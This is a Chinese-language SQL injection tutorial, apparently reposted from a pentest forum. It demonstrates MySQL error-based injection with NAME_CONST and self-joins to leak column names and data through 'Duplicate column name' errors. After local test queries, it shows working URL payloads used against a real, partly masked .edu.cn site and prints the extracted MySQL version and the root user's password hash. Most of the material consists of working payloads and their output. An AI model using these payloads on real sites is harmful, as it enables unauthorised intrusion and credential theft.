1.本地构造测试表
mysql> create table users(id int,name varchar(20),passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)
mysql> insert into users value(1,’mickey’,'827ccb0eea8a706c4c34a16891f84e7b’);
Query OK, 1 row affected (0.00 sec)
mysql> create table news(is_admin int(1),id int(2),title varchar(100),date date);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into news values(1,1,’hello,mickey’,now());
Query OK, 1 row affected, 1 warning (0.00 sec)
2.暴列名
mysql> select * from (select * from users as a join news as b) as c;
ERROR 1060 (42S21): Duplicate column name ‘id’
mysql> select * from (select * from users a join users b using(id)) c;
ERROR 1060 (42S21): Duplicate column name ‘name’
mysql> select * from (select * from users a join users b using(id,name)) c;
ERROR 1060 (42S21): Duplicate column name ‘passwd’
mysql> select * from (select * from users a join users b using(id,name,passwd)) c;
+——+——–+———————————-+
| id | name | passwd |
+——+——–+———————————-+
| 1 | mickey | 827ccb0eea8a706c4c34a16891f84e7b |
+——+——–+———————————-+
1 row in set (0.00 sec)
mysql> select * from (select * from news a join news b using(id)) as c;
ERROR 1060 (42S21): Duplicate column name ‘is_admin’
mysql> select * from (select * from news a join news b using(id,is_admin)) as c;
ERROR 1060 (42S21): Duplicate column name ‘title’
mysql> select * from (select * from news a join news b using(id,is_admin,title)) as c;
ERROR 1060 (42S21): Duplicate column name ‘date’
mysql> select * from (select * from news a join news b using(id,is_admin,title,date)) as c;
+———-+——+————–+————+
| is_admin | id | title | date |
+———-+——+————–+————+
| 1 | 1 | hello,xxx | 2010-05-08 |
+———-+——+————–+————+
1 row in set (0.00 sec)
3.暴字段值
研究出来的暴制语句 select * from cms_votes where vid=1 and exists (select * from (select * from (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin) ,'fuck')) a join (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin),'fuck')) b)c); 运用: mysql> select * from cms_votes where vid=1 and exists (select * from (select * from (select name_const( (select group_concat(concat(uid,0x7c,pwd)) from admin),'fuck')) a join (select name_const((select group_concat(concat(uid,0x7c,pwd)) fromadmin), 'fuck')) b)c); ERROR 1060 (42S21): Duplicate column name 'ylbhz|fuck,mickey|fucked' mysql> mysql> select * from cms_votes where vid=1 and exists (select * from (select * from (select name_const(@@version,0)) a join (select name_const(@@version,0)) b)c); ERROR 1060 (42S21): Duplicate column name '5.0.45-community-nt' 4.实际***案例 http://xxxxxx.edu.cn/qcwh/content/detail.php?id=330&sid=19 &cid=261+and+exists(select*from+(select*from(select+name_const(@@version,0))a+ join+(select+name_const(@@version,0))b)c) Error:Duplicate column name ‘5.0.27-community-nt’Error:Duplicate column name ‘5.0.27-community-nt’ http://xxxxxx.edu.cn/qcwh/content/detail.php?id=330& sid=19&cid=261+and+exists(select*from+(select*from( select+name_const((select+concat(user,password)+from+mysql.user+limit+0,1),0))a+join+ (select+name_const((select+concat(user,password)+from+mysql.user+limit+0,1),0))b)c) Error:Duplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ Error:Duplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
Thx mickey:D
From pentest.cc.